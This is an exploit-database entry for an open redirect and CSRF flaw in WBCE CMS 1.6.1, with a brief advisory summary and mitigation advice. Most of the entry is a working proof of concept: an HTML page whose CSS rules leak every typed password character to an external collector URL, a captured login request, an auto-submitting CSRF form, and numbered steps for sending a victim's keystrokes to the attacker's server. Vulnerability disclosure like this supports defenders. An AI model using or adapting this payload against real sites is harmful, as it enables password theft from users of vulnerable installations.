header-logo
Suggest Exploit
vendor:
WBCE CMS
by:
Mirabbas Agalarov
7.5
CVSS
HIGH
Open Redirect & CSRF
CWE
Product Name: WBCE CMS
Affected Version From: 1.6.2001
Affected Version To: 1.6.2001
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
2023

WBCE CMS 1.6.1 – Open Redirect & CSRF

The WBCE CMS 1.6.1 version is vulnerable to an open redirect and cross-site request forgery (CSRF) attack. By uploading a specially crafted HTML file and tricking a logged-in user to visit a malicious URL, an attacker can exploit this vulnerability to perform CSS keylogging.

Mitigation:

The vendor should release a patch addressing the open redirect and CSRF vulnerabilities. Users are advised to update to the latest version of the software. Additionally, users should be cautious when clicking on untrusted links.
Source

Exploit-DB raw data:

Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF
Version: 1.6.1
Bugs:  Open Redirect + CSRF = CSS KEYLOGGING
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date of found: 03-07-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================

1. Login to Account
2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)
3. Then you upload html file .(html file content is as below)

'''
<html>
    <head>
        <title>
            Login
        </title>
        <style>
            input[type="password"][value*="q"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/q');}
            input[type="password"][value*="w"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/w');}
            input[type="password"][value*="e"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/e');}
            input[type="password"][value*="r"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/r');}
            input[type="password"][value*="t"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/t');}
            input[type="password"][value*="y"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/y');}
            input[type="password"][value*="u"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/u');}
            input[type="password"][value*="i"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/i');}
            input[type="password"][value*="o"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/o');}
            input[type="password"][value*="p"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/p');}
            input[type="password"][value*="a"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/a');}
            input[type="password"][value*="s"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/s');}
            input[type="password"][value*="d"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/d');}
            input[type="password"][value*="f"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/f');}
            input[type="password"][value*="g"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/g');}
            input[type="password"][value*="h"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/h');}
            input[type="password"][value*="j"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/j');}
            input[type="password"][value*="k"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/k');}
            input[type="password"][value*="l"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/l');}
            input[type="password"][value*="z"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/z');}
            input[type="password"][value*="x"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/x');}
            input[type="password"][value*="c"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/c');}
            input[type="password"][value*="v"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/v');}
            input[type="password"][value*="b"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/b');}
            input[type="password"][value*="n"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/n');}
            input[type="password"][value*="m"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/m');}
            input[type="password"][value*="Q"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Q');}
            input[type="password"][value*="W"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/W');}
            input[type="password"][value*="E"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/E');}
            input[type="password"][value*="R"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/R');}
            input[type="password"][value*="T"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/T');}
            input[type="password"][value*="Y"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Y');}
            input[type="password"][value*="U"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/U');}
            input[type="password"][value*="I"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/I');}
            input[type="password"][value*="O"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/O');}
            input[type="password"][value*="P"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/P');}
            input[type="password"][value*="A"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/A');}
            input[type="password"][value*="S"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/S');}
            input[type="password"][value*="D"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/D');}
            input[type="password"][value*="F"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/F');}
            input[type="password"][value*="G"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/G');}
            input[type="password"][value*="H"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/H');}
            input[type="password"][value*="J"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/J');}
            input[type="password"][value*="K"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/K');}
            input[type="password"][value*="L"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/L');}
            input[type="password"][value*="Z"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
            input[type="password"][value*="X"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/X');}
            input[type="password"][value*="C"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/C');}
            input[type="password"][value*="V"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/V');}
            input[type="password"][value*="B"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/B');}
            input[type="password"][value*="N"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/N');}
            input[type="password"][value*="M"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/M');}
            input[type="password"][value*="1"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/1');}
            input[type="password"][value*="2"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/2');}
            input[type="password"][value*="3"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/3');}
            input[type="password"][value*="4"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/4');}
            input[type="password"][value*="5"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/5');}
            input[type="password"][value*="6"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/6');}
            input[type="password"][value*="7"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/7');}
            input[type="password"][value*="8"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/8');}
            input[type="password"][value*="9"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/9');}
            input[type="password"][value*="0"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/0');}
            input[type="password"][value*="-"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/-');}
            input[type="password"][value*="."]{
            background-image: url('https://enflownwx6she.x.pipedream.net/.');}
            input[type="password"][value*="_"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%60');}
            input[type="password"][value*="@"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
            input[type="password"][value*="?"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
            input[type="password"][value*=">"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
            input[type="password"][value*="<"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
            input[type="password"][value*="="]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
            input[type="password"][value*=":"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
            input[type="password"][value*=";"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
        </style>
    </head>
<body>
    <label>Please enter username and password</label>
    <br><br>
    Password:: <input type="password" />
    <script>
        document.querySelector('input').addEventListener('keyup', (evt)=>{
        evt.target.setAttribute('value', evt.target.value);
        })
   </script>
</body>
</html>
'''

4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url.
5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)


POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
Host: localhost
Content-Length: 160
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
Connection: close

url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login
 
6.If write as (https://ATTACKER.com) in url parameter on abowe request on  you redirect to attacker.com.
7.We write to html files url

url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html

8.And create csrf-poc with csrf.poc.generator

<html>
  <title>
    This CSRF was found by miri
  </title>
  <body>
    <h1>
      CSRF POC
    </h1>
    <form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
      <input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>


9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim.


Poc video : https://youtu.be/m-x_rYXTP9E

Navigation

Suggest Exploit

Services By CQR